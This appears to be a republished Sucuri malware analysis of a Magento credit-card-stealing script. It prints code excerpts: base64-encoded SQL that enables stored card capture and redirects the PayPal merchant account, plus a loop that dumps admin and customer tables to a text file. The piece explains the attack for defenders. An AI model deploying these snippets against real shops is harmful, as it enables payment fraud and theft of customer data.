During the initial stages of the attack, the bad actor uses special SQL queries encoded in base64. We’ve decoded these strings under their respective lines in the sample below for your reference:In $ConfKiller,two major malicious operations are being executed: Update DB (Savecc): This function configures the Magento core function to get the client credit card information without letting it go through the typical payment processes that secures the payment information. Update PP (MailPP): This function allows the attacker to make changes in PayPal merchant business account associated with the Magento website. Though Magento does encrypt the locally saved credit card information, in this scenario, this process is not enough because the attacker can modify the Magento core file to steal the encryption from Magento file (./app/etc/local.xml). Once the attacker has access to your site, the attack usually doesn’t remain limited to just the credit card information. Rather, the attacker gains access to everything in the database. For this, the attacker can create an additional variable in the SQL queries to extract the information from the compromised Magento database.$ConfKiller = array( 'Update DB (Savecc)' => base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVf aWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVSRSBgcGF 0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs='), //UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'payment/ ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active'; 'Update PP (MailPP)' => base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lk YCA9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3R lZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7') //UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'paypal/ general/business_account', `value` = '[redacted]@gmail.com' WHERE `path` = 'paypal/general/ business_account';
$query = array( 'admin_user' => 'SELECT * FROM admin_user' , 'core_email_queue_recipients' => 'SELECT * FROM core_email_queue_recipients' ,'aw_blog_comment' => 'SELECT * FROM aw_blog_comment' , 'customer_entity' => 'SELECT * FROM customer_entity' ,The array listing has been shortened for brevity. But, it pulls any customer information stored in the most common Magento database tables (e.g customer_entity, newsletter_subscriber). It then trims this data, keeping only the information required for fraudulent purchases. Finally, it generates a *-shcMail.txt file in the directory containing the relevant customer information.$namefile = md5(time())."-shcMail.txt"; foreach ($query as $shc_key => $shc_query) { $hasil = mysql_query($shc_query); while ( $kolom_db = mysql_fetch_assoc($hasil) ) { $mail[] = $kolom_db[$shcolom[$shc_key]]; $myfile = fopen($namefile, "a+") or die("Unable to open file!"); fwrite($myfile, $kolom_db[$shcolom[$shc_key]]."\r\n"); fclose($myfile);When running this malicious script in a web browser, it simply provides a hyperlink to the generated *-shcMail.txt file. Then it reports back to inform the attacker if the initial two-setting changes were successful or not.
Source: Sucuri
In the highly competitive modern workplace, trust, and employee loyalty are crucial factors for long-term… Read More
In the ever-evolving world of small business developing and implementing effective marketing strategies is critical to… Read More
With one of the highest internet penetration rates, the UAE has set out to revolutionize… Read More
Artificial Intelligence (AI) has been continually evolving, leading to remarkable advancements in various industries. Among… Read More
Extensions, extensions and lots of extensions. We all love extensions, don’t we? After all, extensions… Read More
Software quality is crucial to a firm's success across industries in the quickly changing digital… Read More